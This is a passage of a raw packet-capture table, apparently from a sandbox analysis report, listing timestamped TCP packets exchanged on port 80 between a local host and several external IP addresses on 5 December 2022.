                                                                                                                                                                          Dec 5, 2022 15:15:18.468058109 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.468096972 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.468135118 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.468173027 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.468213081 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.749563932 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.749629974 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.749674082 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.749716997 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.749758959 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.749804974 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.750082970 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.750144958 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.750189066 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.750232935 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.750276089 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.832246065 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.832334995 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:18.832576990 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:18.916414022 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:19.080210924 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:19.080399036 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:19.112162113 CET8049844154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:19.112356901 CET4984480192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:19.932460070 CET4984580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:20.213802099 CET8049845154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:20.214035988 CET4984580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:20.214121103 CET4984580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:20.494959116 CET8049845154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:20.499825954 CET8049845154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:20.499902964 CET8049845154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:20.500201941 CET4984580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:20.500296116 CET4984580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:20.744004011 CET8049845154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:20.744288921 CET4984580192.168.11.20154.204.24.45
                                                                                                                                                                          Dec 5, 2022 15:15:20.781802893 CET8049845154.204.24.45192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:25.835230112 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:25.949418068 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:25.949804068 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:25.949804068 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.064102888 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.263753891 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.263844013 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.263935089 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264007092 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264060020 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.264075041 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264139891 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264204025 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264213085 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.264266014 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264290094 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.264394999 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264465094 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.264470100 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.264662981 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.378420115 CET8049847192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:26.430372953 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:26.961713076 CET4984780192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:27.977111101 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.091336012 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.091804028 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.091943026 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.205868959 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337711096 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337759972 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337796926 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337833881 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337872982 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337903976 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.337933064 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337971926 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.337981939 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.338022947 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.338052988 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.338072062 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.338109016 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.338188887 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.338188887 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:28.452188969 CET8049848192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:28.492441893 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:29.101921082 CET4984880192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.117446899 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.233803034 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.234055996 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.234698057 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.234812021 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.351177931 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351255894 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351305962 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351356983 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351403952 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351449966 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351489067 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.351500034 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351548910 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351578951 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.351599932 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351648092 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.351654053 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.351881981 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.352003098 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.467967033 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468038082 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468082905 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468126059 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468170881 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468168974 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.468219042 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468250990 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.468457937 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468493938 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.468506098 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468641043 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468686104 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468867064 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.468908072 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.469130993 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.584642887 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.584698915 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.584986925 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.585155010 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.585366964 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724493027 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724586010 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724653959 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724718094 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724781990 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724800110 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.724844933 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724906921 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.724910975 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.724975109 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.725038052 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.725106001 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.725105047 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.725182056 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.725301027 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:30.841444969 CET8049849192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:30.882627964 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:31.241928101 CET4984980192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:32.257520914 CET4985080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:32.371480942 CET8049850192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:32.371701002 CET4985080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:32.371812105 CET4985080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:32.485955954 CET8049850192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:32.666039944 CET8049850192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:32.710345984 CET4985080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:42.675189972 CET8049850192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:42.675589085 CET4985080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:42.675590038 CET4985080192.168.11.20192.185.32.157
                                                                                                                                                                          Dec 5, 2022 15:15:42.789839983 CET8049850192.185.32.157192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:47.860594988 CET4985280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:48.023140907 CET804985238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:48.023394108 CET4985280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:48.023472071 CET4985280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:48.185790062 CET804985238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:48.220068932 CET804985238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:48.220156908 CET804985238.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:48.220356941 CET4985280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:49.034782887 CET4985280192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:50.050524950 CET4985380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:50.213646889 CET804985338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:50.214025974 CET4985380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:50.214092016 CET4985380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:50.377185106 CET804985338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:50.414236069 CET804985338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:50.414324999 CET804985338.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:50.414634943 CET4985380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:51.221865892 CET4985380192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.237399101 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.400394917 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.400830030 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.401490927 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.564635992 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.564743042 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.564820051 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.564888000 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.564922094 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.564959049 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.565037966 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.565047979 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.565124035 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.565279007 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.565501928 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.728086948 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728180885 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728255987 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728332043 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728391886 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.728441954 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728492022 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.728518963 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728557110 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.728568077 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728614092 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728658915 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728765011 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.728920937 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.728938103 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:52.728996992 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.729047060 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.729130983 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.729178905 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.729248047 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.729294062 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.891315937 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.891825914 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.891870975 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.892107964 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.892149925 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.892227888 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.892398119 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.892513990 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.930581093 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.930608988 CET804985538.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:52.930732965 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:53.408879042 CET4985580192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:54.424417019 CET4985680192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:54.587145090 CET804985638.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:54.587455034 CET4985680192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:54.587519884 CET4985680192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:54.750041962 CET804985638.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:54.752850056 CET804985638.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:54.752861023 CET804985638.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:54.753315926 CET4985680192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:54.753390074 CET4985680192.168.11.2038.55.15.214
                                                                                                                                                                          Dec 5, 2022 15:15:54.915817976 CET804985638.55.15.214192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.858340979 CET4985780192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:15:59.869424105 CET804985775.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.869724035 CET4985780192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:15:59.869815111 CET4985780192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:15:59.884649992 CET804985775.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.919596910 CET804985775.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.919660091 CET804985775.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.919711113 CET804985775.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:15:59.919852972 CET4985780192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:15:59.919915915 CET4985780192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:00.875957012 CET4985780192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:01.891591072 CET4985880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:01.902719975 CET804985875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:01.903100014 CET4985880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:01.903176069 CET4985880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:01.914328098 CET804985875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:01.953124046 CET804985875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:01.953182936 CET804985875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:01.953228951 CET804985875.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:01.953399897 CET4985880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:02.907061100 CET4985880192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.922346115 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.933609962 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.933809996 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.934403896 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.934498072 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.945410013 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.945650101 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.945688963 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.945749044 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.945791006 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.945995092 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.946063042 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.946110010 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.946151972 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.946232080 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.946274042 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.946307898 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.946347952 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.946460962 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.946630955 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.956736088 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.956772089 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957192898 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957211018 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.957230091 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957365036 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957393885 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957544088 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.957668066 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.957674980 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957710028 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957820892 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957849026 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957925081 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.957952023 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958008051 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.958050966 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958163023 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958175898 CET4985980192.168.11.2075.2.81.212
                                                                                                                                                                          Dec 5, 2022 15:16:03.958291054 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958339930 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958372116 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958399057 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.958425045 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968055964 CET804985975.2.81.212192.168.11.20
                                                                                                                                                                          Dec 5, 2022 15:16:03.968092918 CET804985975.2.81.212192.168.11.20
